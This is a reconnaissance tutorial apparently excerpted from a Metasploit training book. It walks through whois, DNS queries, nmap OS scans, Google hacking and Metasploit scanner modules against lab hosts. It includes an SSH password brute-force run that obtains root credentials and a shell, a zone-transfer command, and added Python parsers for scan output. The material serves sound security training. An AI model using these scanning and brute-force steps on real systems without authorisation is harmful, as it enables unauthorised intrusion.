Sorting out the approach: how do we gather information?

Excerpted from: msf魔鬼训练营 (the Metasploit "devil training camp" book)

0x00: whois

➜  ~ whois testfire.net

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

   Domain Name: TESTFIRE.NET
   Registrar: CSC CORPORATE DOMAINS, INC.
   Sponsoring Registrar IANA ID: 299
   Whois Server: whois.corporatedomains.com
   Referral URL: http://www.cscglobal.com/global/web/csc/digital-brand-services.html
   Name Server: ASIA3.AKAM.NET
   Name Server: EUR2.AKAM.NET
   Name Server: EUR5.AKAM.NET
   Name Server: NS1-206.AKAM.NET
   Name Server: NS1-99.AKAM.NET
   Name Server: USC2.AKAM.NET
   Name Server: USC3.AKAM.NET
   Name Server: USW2.AKAM.NET
   Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Updated Date: 19-jul-2016
   Creation Date: 23-jul-1999
   Expiration Date: 23-jul-2017

...

Domain Name: testfire.net
Registry Domain ID: 8363973_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.corporatedomains.com
Registrar URL: www.cscprotectsbrands.com
Updated Date: 2016-07-19T05:24:30Z
Creation Date: 1999-07-23T13:52:32Z
Registrar Registration Expiration Date: 2017-07-23T13:52:32Z
Registrar: CSC CORPORATE DOMAINS, INC.
Registrar IANA ID: 299
Registrar Abuse Contact Email: domainabuse@cscglobal.com
Registrar Abuse Contact Phone: +1.8887802723
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: 
Registrant Name: IBM DNS Admin
Registrant Organization: International Business Machines Corporation
Registrant Street: New Orchard Road
Registrant City: Armonk
Registrant State/Province: NY
Registrant Postal Code: 10504
Registrant Country: US
Registrant Phone: +1.9147654227
Registrant Phone Ext: 
Registrant Fax: +1.9147654370
Registrant Fax Ext: 
Registrant Email: dnsadm@us.ibm.com
Registry Admin ID: 
Admin Name: IBM DNS Admin
Admin Organization: IBM Corporation
Admin Street: New Orchard Road
Admin City: Armonk
Admin State/Province: NY
Admin Postal Code: 10504
Admin Country: US
Admin Phone: +1.9147654227
Admin Phone Ext: 
Admin Fax: +1.9147654370
Admin Fax Ext: 
Admin Email: dnsadm@us.ibm.com
Registry Tech ID: 
Tech Name: IBM DNS Technical
Tech Organization: IBM Corporation
Tech Street: New Orchard Road
Tech City: Armonk
Tech State/Province: NY
Tech Postal Code: 10504
Tech Country: US
Tech Phone: +1.9147654227
Tech Phone Ext: 
Tech Fax: +1.9147654370
Tech Fax Ext: 
Tech Email: dnstech@us.ibm.com
Name Server: eur2.akam.net
Name Server: ns1-206.akam.net
Name Server: usc3.akam.net
Name Server: usc2.akam.net
Name Server: ns1-99.akam.net
Name Server: usw2.akam.net
Name Server: eur5.akam.net
Name Server: asia3.akam.net
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2016-07-19T05:24:30Z <<<

For more information on Whois status codes, please visit https://icann.org/epp
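The record above is long and the domain is printed twice (the registry's thin record, then the registrar's full one). What a tester actually takes from it is short: who hosts DNS (here Akamai, so the A record you resolve later is probably a CDN edge, not the origin), the contact mailboxes and their domain (address format for later OSINT), whether DNSSEC is on, and how close the domain is to expiry. The parser below is an added example, not from the post or the msf魔鬼训练营 book; the embedded sample is a trimmed copy of the testfire.net record shown above and nothing is fetched from the network. The script name `whois_summary.py` in the usage note is my choice.

```python
import re
from datetime import datetime, timezone

# Constructed sample: a trimmed copy of the registrar record shown above.
WHOIS_SAMPLE = """\
Domain Name: testfire.net
Registrar WHOIS Server: whois.corporatedomains.com
Updated Date: 2016-07-19T05:24:30Z
Creation Date: 1999-07-23T13:52:32Z
Registrar Registration Expiration Date: 2017-07-23T13:52:32Z
Registrar: CSC CORPORATE DOMAINS, INC.
Registrar Abuse Contact Email: domainabuse@cscglobal.com
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: 
Registrant Organization: International Business Machines Corporation
Registrant Email: dnsadm@us.ibm.com
Admin Email: dnsadm@us.ibm.com
Tech Email: dnstech@us.ibm.com
Name Server: eur2.akam.net
Name Server: NS1-206.AKAM.NET
Name Server: usc3.akam.net
Name Server: asia3.akam.net
DNSSEC: unsigned
>>> Last update of WHOIS database: 2016-07-19T05:24:30Z <<<
"""

# 'Key: value' lines only; the key is letters, spaces and '/', so free-text
# notices and the '>>> Last update' line never match.
FIELD_RE = re.compile(r"^\s*([A-Za-z][A-Za-z /]*?):\s*(.*?)\s*$")
EXPIRY_KEYS = ("registrar registration expiration date",
               "registry expiry date", "expiration date")
CONTACT_ROLES = ("registrant", "admin", "tech", "billing")


def parse_whois(text):
    """Map each 'Key: value' line to {key: [values]}. Keys such as
    'Name Server' repeat, so values are kept in a list; empty values
    (e.g. 'Registry Registrant ID: ') are dropped."""
    record = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m and m.group(2):
            record.setdefault(m.group(1).lower(), []).append(m.group(2))
    return record


def _parse_ts(value):
    """Registrar records use 'YYYY-MM-DDTHH:MM:SSZ'; the registry's thin
    record uses '23-jul-2017'. Return an aware UTC datetime or None."""
    for fmt in ("%Y-%m-%dT%H:%M:%SZ", "%d-%b-%Y"):
        try:
            return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            pass
    return None


def summarize(record, now):
    """Reduce a parsed record to the facts a pentester acts on."""
    name_servers = sorted({n.lower().rstrip(".") for n in record.get("name server", [])})
    # The last two labels of each NS name tell you who runs DNS (and often the CDN).
    ns_providers = sorted({".".join(n.split(".")[-2:]) for n in name_servers})
    # Only the target's own contacts; the registrar's abuse mailbox is not theirs.
    emails = sorted({v.lower() for k, vals in record.items()
                     if k.endswith("email") and k.split()[0] in CONTACT_ROLES
                     for v in vals})
    expiry = next((_parse_ts(record[k][0]) for k in EXPIRY_KEYS if k in record), None)
    statuses = " ".join(record.get("domain status", []) + record.get("status", [])).lower()
    return {
        "domain": record.get("domain name", ["?"])[0].lower(),
        "registrar": record.get("registrar", ["?"])[0],
        "name_servers": name_servers,
        "ns_providers": ns_providers,
        "contact_emails": emails,
        # The mail domain is where the organisation's addresses actually live.
        "email_domains": sorted({e.split("@", 1)[1] for e in emails}),
        "dnssec_signed": record.get("dnssec", ["unsigned"])[0].lower() != "unsigned",
        "transfer_locked": "clienttransferprohibited" in statuses,
        "days_to_expiry": (expiry - now).days if expiry else None,
    }


def report(text, as_of):
    """Parse and summarise; as_of is an ISO-8601 UTC timestamp string."""
    now = datetime.strptime(as_of, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return summarize(parse_whois(text), now)


if __name__ == "__main__":
    import json
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else WHOIS_SAMPLE
    now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    print(json.dumps(report(text, now), indent=2))
```

Run it as `whois testfire.net | python3 whois_summary.py`; with no input on stdin it summarises the embedded sample. Both the thin and the full record parse with the same regex, and repeated name servers in different case collapse to one entry.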

0x01: nslookup

nslookup asks the local resolver, which answers from its cache rather than from the zone's own servers; that is why the reply is marked "Non-authoritative answer".

➜  ~ nslookup 
> set type=A
> testfire.net
Server:     118.118.118.51
Address:    118.118.118.51#53

Non-authoritative answer:
Name:   testfire.net
Address: 65.61.137.117
> exit

0x02: dig

Usage: dig [@global-server] [domain] [q-type] [q-class] {q-opt}
{global-d-opt} host [@local-server] {local-d-opt}
[ host [@local-server] {local-d-opt} […]]

➜  ~ dig @ns.watson.ibm.com testfire.net

; <<>> DiG 9.10.3-P4-Debian <<>> @ns.watson.ibm.com testfire.net
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 1588
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;testfire.net.          IN  A

;; Query time: 310 msec
;; SERVER: 129.34.20.80#53(129.34.20.80)
;; WHEN: Sun May 21 21:45:36 CST 2017
;; MSG SIZE  rcvd: 41

status: REFUSED together with "recursion requested but not available" means ns.watson.ibm.com is neither authoritative for testfire.net nor willing to recurse for outsiders, so it returns nothing. Ask one of the authoritative servers from the whois record instead, e.g. dig @ns1-206.akam.net testfire.net, and expect the aa flag in the reply; those same servers are where a zone-transfer check (dig @ns1-206.akam.net testfire.net AXFR) belongs.

0x03: searchdns.netcraft.com

A lookup service for subdomains, operating system type, server addresses, domain addresses and geographic location.

Netcraft: https://searchdns.netcraft.com

0x04: IP2Location

China: 纯真 (the CZ88 / QQWry IP database)
International: https://www.maxmind.com/zh/home

0x05: IP2Domain (reverse IP lookup: other domains hosted on the same address)

China: 7C
International: http://www.ip-adress.com/reverse_ip

0x07: Port scanning and host discovery

MSF: sweep the local segment with auxiliary/scanner/discovery/arp_sweep (ARP only reaches the directly attached network) or use another discovery module.

Using Nmap

It needs no introduction. The official examples (from nmap -h):

EXAMPLES:
  nmap -v -A scanme.nmap.org   # the all-in-one scan; -A adds OS and version detection, default scripts and traceroute, so it is slow
  nmap -v -sn 192.168.0.0/16 10.0.0.0/8
  nmap -v -iR 10000 -Pn -p 80

Use nmap -O to fingerprint the operating system (it sends raw packets, hence sudo):
➜  ~ sudo nmap -O 192.168.1.104

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-21 23:11 CST
Nmap scan report for bogon (192.168.1.104)
Host is up (0.026s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
5357/tcp open  wsdapi
6881/tcp open  bittorrent-tracker
MAC Address: 00:25:D3:E0:17:23 (AzureWave Technology)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS details: Microsoft Windows Server 2008 or 2008 Beta 3, Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.41 seconds

Read the warning before trusting the OS line: fingerprinting needs one open and one closed port to compare, and this host only had open and filtered ones (996 probes were dropped by a firewall), so nmap could do no better than the wide spread of Windows versions listed. Treat it as "some Windows" and confirm with service banners (-sV) or --script smb-os-discovery if 445/tcp turns out to be reachable.
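Reading scan output by eye works for one host; for a /24 you want it structured. The parser below is an added example, not part of the post or the book: it reads nmap's normal output into one record per host and writes the notes a tester would log, including the firewalled, unreliable-OS situation seen above. The embedded sample is the transcript above plus a second, constructed host with -sV version strings so the VERSION column is exercised too. For anything larger, prefer -oX or -oG output, which is made for parsing; this script exists for the cases where all you have is the console log.

```python
import re

# Constructed sample: the 'sudo nmap -O 192.168.1.104' transcript above plus a
# second, made-up host with -sV version strings, so both layouts are covered.
NMAP_SAMPLE = """\
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-21 23:11 CST
Nmap scan report for bogon (192.168.1.104)
Host is up (0.026s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
5357/tcp open  wsdapi
6881/tcp open  bittorrent-tracker
MAC Address: 00:25:D3:E0:17:23 (AzureWave Technology)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS details: Microsoft Windows Server 2008 or 2008 Beta 3, Microsoft Windows 7 Professional or Windows 8
Network Distance: 1 hop

Nmap scan report for 10.10.10.129
Host is up (0.00041s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.3p1 Debian 3ubuntu4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.14 ((Ubuntu))
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop

Nmap done: 2 IP addresses (2 hosts up) scanned in 31.02 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:(\S+) \()?(\d+\.\d+\.\d+\.\d+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
NOT_SHOWN_RE = re.compile(r"^Not shown: \d+ (\w+) ports?")


def _new_host(hostname, ip):
    return {"hostname": hostname, "ip": ip, "ports": [], "mac": None,
            "not_shown_state": None, "os_details": "", "os_unreliable": False}


def parse_nmap(text):
    """Parse nmap's normal (stdout / -oN) output into one dict per host."""
    hosts, cur = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            cur = _new_host(m.group(1), m.group(2))
            hosts.append(cur)
            continue
        if cur is None:
            continue                      # banner lines before the first host
        m = PORT_RE.match(line)
        if m:
            cur["ports"].append({"port": int(m.group(1)), "proto": m.group(2),
                                 "state": m.group(3), "service": m.group(4),
                                 "version": m.group(5) or ""})
            continue
        m = NOT_SHOWN_RE.match(line)
        if m:
            cur["not_shown_state"] = m.group(1)   # 'filtered' => firewall in the path
        elif line.startswith("MAC Address:"):
            cur["mac"] = line.split()[2]
        elif line.startswith("OS details:"):
            cur["os_details"] = line.split(":", 1)[1].strip()
        elif line.startswith("Warning: OSScan results may be unreliable"):
            cur["os_unreliable"] = True
    return hosts


def triage(host):
    """Write the notes a tester would log for one host."""
    open_ports = [p for p in host["ports"] if p["state"] == "open"]
    notes = ["%s: %d open port(s): %s" % (
        host["ip"], len(open_ports),
        ", ".join("%d/%s %s" % (p["port"], p["proto"], p["service"]) for p in open_ports))]
    if host["not_shown_state"] == "filtered":
        # Dropped probes mean a firewall: more ports may hide behind it, and OS
        # fingerprinting has no closed port to compare against.
        notes.append("firewalled: unlisted ports are filtered; rescan with -p- and --reason")
    if host["os_unreliable"]:
        notes.append("OS guess unreliable, confirm via -sV or smb-os-discovery: " + host["os_details"])
    elif host["os_details"]:
        notes.append("OS: " + host["os_details"])
    notes += ["%d/%s banner: %s" % (p["port"], p["proto"], p["version"])
              for p in open_ports if p["version"]]
    return notes


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else NMAP_SAMPLE
    for h in parse_nmap(text):
        print("\n".join(triage(h)))
```

Feed a saved console log on stdin (`nmap -sV -O -oN scan.txt ...` then `python3 nmap_notes.py < scan.txt`; the script name is my choice). Hosts that were down never produce a "scan report" line and so never appear.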

0x08: Web information gathering

Everything above targets domains, systems, addresses and locations. From here on the target is the web application itself.

–0x0800 dir: website directory enumeration

Google hacking: the site:, inurl:, intitle: and filetype: operators scoped to the target domain.

Or use the MSF auxiliary modules, e.g. auxiliary/scanner/http/dir_scanner, auxiliary/scanner/http/files_dir and auxiliary/scanner/http/dir_listing.

–0x0801 Finding special files

Typical queries look for document and backup types the site never meant to publish, e.g. site:target filetype:xls or site:target ext:bak.

–0x0802 Finding specific pages

Typical queries look for administrative or error pages, e.g. site:target inurl:admin or site:target intitle:"index of".

For more operators and patterns, see the Google Hacking technical manual.

0x09: Network service scanning

–0x0900 telnet service

Telnet sends everything, credentials included, in cleartext, so it is insecure and has mostly been replaced by SSH. Any telnet listener you find is itself a finding, and its banner usually names the OS, as the Ubuntu 8.04 line below shows.

msf > use auxiliary/scanner/telnet/telnet_version 
msf auxiliary(telnet_version) > set rhosts 10.10.10.0/24
rhosts => 10.10.10.0/24
msf auxiliary(telnet_version) > set threads 100
threads => 100
msf auxiliary(telnet_version) > run

[*] Scanned 028 of 256 hosts (010% complete)
[*] Scanned 078 of 256 hosts (030% complete)
[*] Scanned 097 of 256 hosts (037% complete)
[*] Scanned 105 of 256 hosts (041% complete)
[*] Scanned 132 of 256 hosts (051% complete)
[*] Scanned 171 of 256 hosts (066% complete)
[*] Scanned 197 of 256 hosts (076% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 233 of 256 hosts (091% complete)
[*] 10.10.10.254:23 TELNET Ubuntu 8.04\x0ametasploitable login:
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
–0x0901 SSH weak passwords

Identify the SSH servers with ssh_version first, then try credentials against the ones found with ssh_login:

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set rhosts 10.10.10.0/24
rhosts => 10.10.10.0/24
msf auxiliary(ssh_version) > set threads 100
threads => 100
msf auxiliary(ssh_version) > run

[*] Scanned 052 of 256 hosts (020% complete)
[*] 10.10.10.129:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 065 of 256 hosts (025% complete)
[*] Scanned 100 of 256 hosts (039% complete)
[*] Scanned 104 of 256 hosts (040% complete)
[*] Scanned 147 of 256 hosts (057% complete)
[*] Scanned 179 of 256 hosts (069% complete)
[*] 10.10.10.254:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 195 of 256 hosts (076% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 251 of 256 hosts (098% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 10.10.10.129 10.10.10.254
rhosts => 10.10.10.129 10.10.10.254
msf auxiliary(ssh_login) > set threads 50
threads => 50
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set pass_file /root/pass
pass_file => /root/pass
msf auxiliary(ssh_login) > run

[*] 10.10.10.254:22 SSH - Starting bruteforce
[*] 10.10.10.254:22 SSH - [1/5] - Trying: username: 'root' with password: ''
[*] 10.10.10.129:22 SSH - Starting bruteforce
[*] 10.10.10.129:22 SSH - [1/5] - Trying: username: 'root' with password: ''
[-] 10.10.10.254:22 SSH - [1/5] - Failed: 'root':''
[*] 10.10.10.254:22 SSH - [2/5] - Trying: username: 'ling' with password: ''
[-] 10.10.10.129:22 SSH - [1/5] - Failed: 'root':''
[*] 10.10.10.129:22 SSH - [2/5] - Trying: username: 'ling' with password: ''
[-] 10.10.10.254:22 SSH - [2/5] - Failed: 'ling':''
[*] 10.10.10.254:22 SSH - [3/5] - Trying: username: 'root' with password: 'root'
[-] 10.10.10.129:22 SSH - [2/5] - Failed: 'ling':''
[*] 10.10.10.129:22 SSH - [3/5] - Trying: username: 'root' with password: 'root'
[-] 10.10.10.254:22 SSH - [3/5] - Failed: 'root':'root'
[*] 10.10.10.254:22 SSH - [4/5] - Trying: username: 'ling' with password: 'ling'
[-] 10.10.10.129:22 SSH - [3/5] - Failed: 'root':'root'
[*] 10.10.10.129:22 SSH - [4/5] - Trying: username: 'ling' with password: 'ling'
[-] 10.10.10.254:22 SSH - [4/5] - Failed: 'ling':'ling'
[*] 10.10.10.254:22 SSH - [5/5] - Trying: username: 'root' with password: 'ling'
[-] 10.10.10.254:22 SSH - [5/5] - Failed: 'root':'ling'
[-] 10.10.10.129:22 SSH - [4/5] - Failed: 'ling':'ling'
[*] 10.10.10.129:22 SSH - [5/5] - Trying: username: 'root' with password: 'ling'
[*] Command shell session 1 opened (10.10.10.131:43480 -> 10.10.10.129:22) at 2017-05-21 21:45:18 -0400
[+] 10.10.10.129:22 SSH - [5/5] - Success: 'root':'ling' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed

A success line carries the id and uname output msf collected as proof, and a shell session is opened automatically (session 1 above). Each attempt is a complete SSH authentication that sshd logs on the target, so 50 threads against a live network is loud and may trigger lockout or fail2ban-style blocking; keep THREADS and the word list small, and set STOP_ON_SUCCESS true so the module stops hammering a host once it has working credentials.
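Scanner output like the above scrolls past quickly, and the lines worth keeping (banners, successful logins) are buried in progress messages. The triage script below is an added example, not from the post or the book: it parses telnet_version, ssh_version and ssh_login lines into per-host records, splits each SSH banner into protocol and OpenSSH version, and emits severity-ranked findings. The sample lines are constructed from the transcripts above plus one SSH-1.99 banner so the protocol-1 case is exercised; the 7.0 OpenSSH baseline is an assumption of the example, not a statement about any particular vulnerability, so set it from your own policy.

```python
import ipaddress
import re

# Constructed sample in the shape of the telnet_version, ssh_version and
# ssh_login output above, with one SSH-1.99 banner added for the protocol-1 case.
MSF_SAMPLE = r"""
[*] Scanned 028 of 256 hosts (010% complete)
[*] 10.10.10.254:23 TELNET Ubuntu 8.04\x0ametasploitable login:
[*] 10.10.10.129:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] 10.10.10.254:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] 10.10.10.7:22, SSH server version: SSH-1.99-OpenSSH_3.9p1
[-] 10.10.10.254:22 SSH - [3/5] - Failed: 'root':'root'
[+] 10.10.10.129:22 SSH - [5/5] - Success: 'root':'ling' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Auxiliary module execution completed
"""

TELNET_RE = re.compile(r"^\[\*\] (\S+):(\d+) TELNET (.*)$")
SSH_VER_RE = re.compile(r"^\[\*\] (\S+):(\d+), SSH server version: (\S.*)$")
SSH_LOGIN_RE = re.compile(r"^\[\+\] (\S+):(\d+) SSH - .*Success: '([^']*)':'([^']*)'")
OPENSSH_RE = re.compile(r"OpenSSH_(\d+)\.(\d+)")
SEVERITY = ("critical", "high", "medium", "low")


def parse_msf(text):
    """Group scanner output by host; returns {ip: {telnet, ssh_banner, creds}}."""
    hosts = {}

    def host(ip):
        return hosts.setdefault(ip, {"telnet": None, "ssh_banner": None, "creds": []})

    for line in text.splitlines():
        m = TELNET_RE.match(line)
        if m:
            # msf escapes control characters, so the banner carries a literal '\x0a'.
            host(m.group(1))["telnet"] = m.group(3).replace(r"\x0a", " | ").strip()
            continue
        m = SSH_VER_RE.match(line)
        if m:
            host(m.group(1))["ssh_banner"] = m.group(3)
            continue
        m = SSH_LOGIN_RE.match(line)
        if m:
            host(m.group(1))["creds"].append((m.group(3), m.group(4)))
    return hosts


def ssh_facts(banner):
    """Split 'SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4' into protocol and version."""
    proto = banner.split("-", 2)[1] if banner.count("-") >= 2 else "?"
    m = OPENSSH_RE.search(banner)
    return {
        "proto": proto,
        "openssh": (int(m.group(1)), int(m.group(2))) if m else None,
        # 'SSH-1.99' means the server negotiates both 2.0 and the broken protocol 1.
        "protocol1": proto.startswith("1."),
    }


def findings(hosts, min_openssh=(7, 0)):
    """Convert parsed hosts into (severity, ip, text) tuples, most severe first.
    min_openssh is an assumed baseline for this example, not a CVE boundary."""
    out = []
    for ip, h in sorted(hosts.items(), key=lambda kv: ipaddress.ip_address(kv[0])):
        if h["telnet"] is not None:
            out.append(("medium", ip, "cleartext telnet service: " + h["telnet"]))
        if h["ssh_banner"]:
            f = ssh_facts(h["ssh_banner"])
            if f["protocol1"]:
                out.append(("high", ip, "SSH protocol 1 offered: " + h["ssh_banner"]))
            if f["openssh"] and f["openssh"] < min_openssh:
                out.append(("low", ip, "OpenSSH %d.%d below baseline %d.%d"
                            % (f["openssh"] + min_openssh)))
        for user, pw in h["creds"]:
            out.append(("critical", ip, "valid SSH credentials %s:%s" % (user, pw)))
    out.sort(key=lambda f: SEVERITY.index(f[0]))   # stable: IP order kept per level
    return out


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else MSF_SAMPLE
    for sev, ip, msg in findings(parse_msf(text)):
        print("%-8s %-15s %s" % (sev.upper(), ip, msg))
```

Capture the console with msfconsole's spool command (spool /tmp/scan.log before running the modules) and feed that file on stdin; the script name is up to you. Progress lines and failed attempts are ignored on purpose, so only the banners and working credentials reach the report.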

0x0A: Using a vulnerability scanner

OpenVAS

0x0B: Configuring the MSF database

http://blog.csdn.net/xiongjun_cdn/article/details/51241083
